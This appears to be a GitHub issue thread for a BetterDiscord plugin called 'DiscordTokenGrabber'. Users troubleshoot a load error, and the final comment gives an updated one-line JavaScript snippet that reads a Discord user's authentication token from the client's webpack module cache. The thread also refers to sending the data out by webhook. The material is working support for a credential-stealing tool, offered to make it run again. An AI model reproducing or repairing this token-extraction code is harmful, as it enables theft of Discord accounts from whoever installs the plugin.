ethernalsteve/BetterDiscordTokenGrabber

load() could not be fired

Opened this issue · 6 comments

ive tried everything to get this to work i need your help fixing it please ive modified the script and everything but it still says this:

DiscordTokenGrabber: load() could not be fired.
at Object.initializeAddon (:4:230890)
at Object.loadAddon (:4:192835)
at Object.loadAddon (:4:230120)
at FSWatcher. (:4:190819)

Hello. I need the complete code to tell me what's the matter. You don't need to send secret data by webhook type

that's what it gave me when i dragged the js file into the plugin folder there was nothing else just a pop up that said that

heres a screen shot https://cdn.discordapp.com/attachments/746406161724604437/839960396953944114/unknown.png

bump?

same issue

alright, i checked it out and instead of using
Object.values(webpackJsonp.push([ [], { ['']: (_, e, r) => { e.cache = r.c } }, [ [''] ] ]).cache).find(m => m.exports && m.exports.default && m.exports.default.getToken !== void 0).exports.default.getToken();
You should modify it to be:
(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken();